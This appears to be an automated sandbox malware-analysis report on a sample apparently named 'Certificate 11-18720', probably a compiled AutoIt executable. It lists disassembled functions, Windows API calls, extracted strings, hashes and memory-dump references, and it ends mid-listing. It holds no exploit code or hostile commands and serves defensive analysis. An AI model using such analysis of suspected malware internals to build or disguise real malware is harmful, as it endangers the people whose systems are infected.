                                                                                    • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                    • Instruction ID: c868c8335abcf60c4906f49dec3e54a7deb420ff4b901e9a176a52fd5f0c928c
                                                                                    • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                    • Instruction Fuzzy Hash: 1DC1A2322051E30ADF6D463E843453EBFA1AA917B131A2B6ED4F3CB5D5EE60C564D720
                                                                                    Function 005E06D9 Relevance: .3, Instructions: 341COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                    • Instruction ID: bf4632417252c359999ecb48c1a35dca86f5a2c97f902b0aad81cb842d84145d
                                                                                    • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                    • Instruction Fuzzy Hash: D3C1A2322051E309DF6D463E943443EBFA1AAA27B131A276ED4F3CB5D5EF60C564D620
                                                                                    Function 005DFA57 Relevance: .3, Instructions: 323COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                    • Instruction ID: f11420345aec0a4db45f486231acebdfdd2670e72dfffbba1091eb8fa3de0900
                                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                    • Instruction Fuzzy Hash: 1AC181322091A309DB7D463D943443EBFA5AAA17B531A0B7FD4B3CB6D5EE20C564D720
                                                                                    Function 00F47628 Relevance: .1, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                    • Instruction ID: a3e2e325b620e808829b4fc617c241ed444b9fdb0047b45cac7374c821d96b31
                                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                    • Instruction Fuzzy Hash: 5C41A471D1051CDBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                    Function 00F474B8 Relevance: .0, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                    • Instruction ID: cd0f70751f298d8cf7c448d3d748a47761a57e855ea6da87ca5a02640a4174b9
                                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                    • Instruction Fuzzy Hash: 70019278E04209EFCB44EF98C5909AEFBB5FB48310F208599EC09A7705D730AE41EB80
                                                                                    Function 00F47518 Relevance: .0, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                    • Instruction ID: 7985b563a1e259fea179c11b7a3b76992035560e5114310b76dc21e39a9aa7bf
                                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                    • Instruction Fuzzy Hash: 87018478E04209EFCB44DF98C5909AEFBB5FB48310F248599DC199B305D730AE41DB80
                                                                                    Function 00F45E58 Relevance: .0, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                    Function 0061A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 0061A2FE
                                                                                    • DeleteObject.GDI32(00000000), ref: 0061A310
                                                                                    • DestroyWindow.USER32 ref: 0061A31E
                                                                                    • GetDesktopWindow.USER32 ref: 0061A338
                                                                                    • GetWindowRect.USER32(00000000), ref: 0061A33F
                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0061A480
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0061A490
                                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A4D8
                                                                                    • GetClientRect.USER32(00000000,?), ref: 0061A4E4
                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0061A51E
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A540
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A553
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A55E
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0061A567
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A576
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0061A57F
                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A586
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0061A591
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A5A3
                                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0064D9BC,00000000), ref: 0061A5B9
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0061A5C9
                                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0061A5EF
                                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0061A60E
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A630
                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061A81D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                    • API String ID: 2211948467-2373415609
                                                                                    • Opcode ID: 9d493a81c52a45bee84f6f684dae26845977da1d67c546f14e7de824181a05db
                                                                                    • Instruction ID: aa4bd10a037a09a821c46bbff349fdb6f93556564a4e7c05f814e634e29114c8
                                                                                    • Opcode Fuzzy Hash: 9d493a81c52a45bee84f6f684dae26845977da1d67c546f14e7de824181a05db
                                                                                    • Instruction Fuzzy Hash: EB028C75A00215EFDB14DFA4CD89EAE7BBAFF49310F148158F915AB2A0CB70AD41CB60
                                                                                    Function 0062D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0062D2DB
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0062D30C
                                                                                    • GetSysColor.USER32(0000000F), ref: 0062D318
                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0062D332
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0062D341
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0062D36C
                                                                                    • GetSysColor.USER32(00000010), ref: 0062D374
                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0062D37B
                                                                                    • FrameRect.USER32(?,?,00000000), ref: 0062D38A
                                                                                    • DeleteObject.GDI32(00000000), ref: 0062D391
                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0062D3DC
                                                                                    • FillRect.USER32(?,?,00000000), ref: 0062D40E
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0062D439
                                                                                      • Part of subcall function 0062D575: GetSysColor.USER32(00000012), ref: 0062D5AE
                                                                                      • Part of subcall function 0062D575: SetTextColor.GDI32(?,?), ref: 0062D5B2
                                                                                      • Part of subcall function 0062D575: GetSysColorBrush.USER32(0000000F), ref: 0062D5C8
                                                                                      • Part of subcall function 0062D575: GetSysColor.USER32(0000000F), ref: 0062D5D3
                                                                                      • Part of subcall function 0062D575: GetSysColor.USER32(00000011), ref: 0062D5F0
                                                                                      • Part of subcall function 0062D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0062D5FE
                                                                                      • Part of subcall function 0062D575: SelectObject.GDI32(?,00000000), ref: 0062D60F
                                                                                      • Part of subcall function 0062D575: SetBkColor.GDI32(?,00000000), ref: 0062D618
                                                                                      • Part of subcall function 0062D575: SelectObject.GDI32(?,?), ref: 0062D625
                                                                                      • Part of subcall function 0062D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0062D644
                                                                                      • Part of subcall function 0062D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0062D65B
                                                                                      • Part of subcall function 0062D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0062D670
                                                                                      • Part of subcall function 0062D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0062D698
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 3521893082-0
                                                                                    • Opcode ID: 50301d81b785f71cfd873b798cdbc93a4bf850e16512d0bf4edca399a73ec228
                                                                                    • Instruction ID: f52fdac174de50a70ff869c47359469237bf79cfb1bf3733a6683251f9649912
                                                                                    • Opcode Fuzzy Hash: 50301d81b785f71cfd873b798cdbc93a4bf850e16512d0bf4edca399a73ec228
                                                                                    • Instruction Fuzzy Hash: BD91AF76808711BFDB119F64DC08E6B7BAAFF8A325F101A19F962961E0CB70D944CF52
                                                                                    Function 005DB8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DestroyWindow.USER32 ref: 005DB98B
                                                                                    • DeleteObject.GDI32(00000000), ref: 005DB9CD
                                                                                    • DeleteObject.GDI32(00000000), ref: 005DB9D8
                                                                                    • DestroyIcon.USER32(00000000), ref: 005DB9E3
                                                                                    • DestroyWindow.USER32(00000000), ref: 005DB9EE
                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0063D2AA
                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0063D2E3
                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0063D711
                                                                                      • Part of subcall function 005DB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005DB759,?,00000000,?,?,?,?,005DB72B,00000000,?), ref: 005DBA58
                                                                                    • SendMessageW.USER32 ref: 0063D758
                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0063D76F
                                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 0063D785
                                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 0063D790
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                    • String ID: 0
                                                                                    • API String ID: 464785882-4108050209
                                                                                    • Opcode ID: d2fc8e8318fba25694c84816e4420d7e3f545db9d0906c1f443d03e092c01299
                                                                                    • Instruction ID: 30bc548cfa76b7406f3c78fc82ca9a88660f5feb394281b0eaf0e8bb82d9be2f
                                                                                    • Opcode Fuzzy Hash: d2fc8e8318fba25694c84816e4420d7e3f545db9d0906c1f443d03e092c01299
                                                                                    • Instruction Fuzzy Hash: 83129A74604241DFEB24CF28D898BA9BBE6BF49304F14556AE989CB362C731EC45CB91
                                                                                    Function 0060DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0060DBD6
                                                                                    • GetDriveTypeW.KERNEL32(?,0065DC54,?,\\.\,0065DC00), ref: 0060DCC3
                                                                                    • SetErrorMode.KERNEL32(00000000,0065DC54,?,\\.\,0065DC00), ref: 0060DE29
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DriveType
                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                    • API String ID: 2907320926-4222207086
                                                                                    • Opcode ID: af2c18059b0167d48becd5754bb9c146e5f6dd10e90b89832c4c01237a86b076
                                                                                    • Instruction ID: 8c8c72144cfbd64d7ece54973cee128732ec29d61bd98ef7a8db2926c65b2055
                                                                                    • Opcode Fuzzy Hash: af2c18059b0167d48becd5754bb9c146e5f6dd10e90b89832c4c01237a86b076
                                                                                    • Instruction Fuzzy Hash: 345193302C8312ABC218DB90C985D6BBBA3FFA4744B159A1DF44B973D1DA70D946E742
                                                                                    Function 005CCC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                    • API String ID: 1038674560-86951937
                                                                                    • Opcode ID: 63124537db9a9fafb011a2f1a6d88e45dee742c9d89dbd7efb2b30cf026faa5f
                                                                                    • Instruction ID: 58c012d9dc0b816488e0dc960c1fa9342660eb33e11aa7e7a27866b04f22a25b
                                                                                    • Opcode Fuzzy Hash: 63124537db9a9fafb011a2f1a6d88e45dee742c9d89dbd7efb2b30cf026faa5f
                                                                                    • Instruction Fuzzy Hash: E981E8306402576ECB25AAA4DC97FBB3F6AFF54700F04402DF94AAA2C2EA60D945C795
                                                                                    Function 0062638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?,0065DC00), ref: 00626449
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                    • API String ID: 3964851224-45149045
                                                                                    • Opcode ID: fb17d7f0a47805406ac54f1bf304d5c4e79247d2770494febab83baef9ec9ce6
                                                                                    • Instruction ID: 0ae5f031b0b9eb11e09ee161874027e39189ff91b6aa3bef67f65e1189f9ac20
                                                                                    • Opcode Fuzzy Hash: fb17d7f0a47805406ac54f1bf304d5c4e79247d2770494febab83baef9ec9ce6
                                                                                    • Instruction Fuzzy Hash: 75C17230204656CBCB14EF14D555AAE7BA7BFD4344F14885AF8865B3A2DB24ED0BCF82
                                                                                    Function 0062D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000012), ref: 0062D5AE
                                                                                    • SetTextColor.GDI32(?,?), ref: 0062D5B2
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0062D5C8
                                                                                    • GetSysColor.USER32(0000000F), ref: 0062D5D3
                                                                                    • CreateSolidBrush.GDI32(?), ref: 0062D5D8
                                                                                    • GetSysColor.USER32(00000011), ref: 0062D5F0
                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0062D5FE
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0062D60F
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0062D618
                                                                                    • SelectObject.GDI32(?,?), ref: 0062D625
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0062D644
                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0062D65B
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0062D670
                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0062D698
                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0062D6BF
                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0062D6DD
                                                                                    • DrawFocusRect.USER32(?,?), ref: 0062D6E8
                                                                                    • GetSysColor.USER32(00000011), ref: 0062D6F6
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0062D6FE
                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0062D712
                                                                                    • SelectObject.GDI32(?,0062D2A5), ref: 0062D729
                                                                                    • DeleteObject.GDI32(?), ref: 0062D734
                                                                                    • SelectObject.GDI32(?,?), ref: 0062D73A
                                                                                    • DeleteObject.GDI32(?), ref: 0062D73F
                                                                                    • SetTextColor.GDI32(?,?), ref: 0062D745
                                                                                    • SetBkColor.GDI32(?,?), ref: 0062D74F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 1996641542-0
                                                                                    • Opcode ID: 3ad3b7444245680760449f72368bceb2db483a737e256eca9f97140414c378d4
                                                                                    • Instruction ID: 592b1820495f310a587fe998c9a9c6af3a6184cded3d04f9d8994adf8897de18
                                                                                    • Opcode Fuzzy Hash: 3ad3b7444245680760449f72368bceb2db483a737e256eca9f97140414c378d4
                                                                                    • Instruction Fuzzy Hash: BB514975D00218AFDB11AFA8DC48EEE7B7AFB0A324F205115FA15AB2A1D7719A40CF50
                                                                                    Function 0062B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0062B7B0
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0062B7C1
                                                                                    • CharNextW.USER32(0000014E), ref: 0062B7F0
                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0062B831
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0062B847
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0062B858
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0062B875
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0062B8C7
                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0062B8DD
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0062B90E
                                                                                    • _memset.LIBCMT ref: 0062B933
                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0062B97C
                                                                                    • _memset.LIBCMT ref: 0062B9DB
                                                                                    • SendMessageW.USER32 ref: 0062BA05
                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0062BA5D
